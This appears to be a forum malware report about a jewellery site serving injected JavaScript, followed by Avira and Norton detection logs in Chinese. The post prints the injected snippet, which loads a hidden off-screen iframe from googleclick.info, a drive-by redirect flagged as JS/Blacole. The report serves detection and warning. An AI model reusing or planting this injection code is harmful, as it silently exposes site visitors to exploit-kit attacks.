http://www.vivaaccessories.com/category/homecallout/earringcollection/

fireold

1. if (document.getElementsByTagName('body')[0]) {
   
2.                     iframer();
   
3.                 } else {
   
4.                     document.write("<iframe src='http://googleclick.info/?travel' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
   
5.                 }
   
6.                 function iframer() {
   
7.                     var f = document.createElement('iframe');
   
8.                     f.setAttribute('src', 'http://googleclick.info/?travel');
   
9.                     f.style.left = '-10000px';
   
10.                     f.style.visibility = 'hidden';
    
11.                     f.style.top = '0';
    
12.                     f.style.position = 'absolute';
    
13.                     f.style.top = '0';
    
14.                     f.setAttribute('width', '100');
    
15.                     f.setAttribute('height', '100');
    
16.                     document.getElementsByTagName('body')[0].appendChild(f);
    
17.                 }

复制代码

Avira

2013/11/11 上午 07:07 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\earringcollection[1].htm'
      包含病毒或有害的程式 'JS/Blacole.LV' [virus]
      已採取動作：
      檔案會移動至 '546fb316.qua' 名稱底下的隔離區目錄。.

2013/11/11 上午 07:07 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        811
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/11/11 上午 07:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\earringcollection[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.LV [virus]'
      執行的動作：傳輸至掃描程式

2013/11/11 上午 07:06 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\7853OJ09\earringcollection[1].htm 中
      偵測到病毒或有害的程式 'JS/Blacole.LV [virus]'
      執行的動作：拒絕存取

2013/11/11 上午 07:06 [Web Protection] 發現惡意程式碼
      從 URL "http://www.vivaaccessories.com/category/homecallout/earringcollection/"
      存取資料時，
      發現病毒或有害的程式 'JS/Blacole.LV' [virus]。
      已採取動作：已略過

fs is

xwems

类别： 入侵防护
日期和时间,风险,活动,状态,推荐的操作,IPS 警报名称,默认操作,采取的操作,攻击电脑,攻击者网址,目标地址,源地址,通信说明
2013/11/12 19:12:15,高,阻止了 ww.vivaaccessories.com 的入侵企图,已阻止,不需要操作,Web Attack: Mass Injection Website 5,不需要操作,不需要操作,"ww.vivaaccessories.com (66.45.231.186, 80)",ww.vivaaccessories.com/category/homecallout/earringcollection/,"LD-PC (192.168.1.2,)",66.45.231.186 (66.45.231.186),"TCP, www-http"
来自 <b>www.vivaaccessories.com/category/homecallout/earringcollection/</b> 的网络通信与已知攻击的特征相匹配。攻击由 \DEVICE\HARDDISKVOLUME3\PROGRAM FILES\360\360SE6\APPLICATION\360SE.EXE 引起。  要停止接收有关此类通信的通知，请在<b>“操作”</b>面板中单击<b>“不再提醒我”</b>。


挂上360安全游览器来测试毒网 ，诺顿特警 拦截毒网攻击。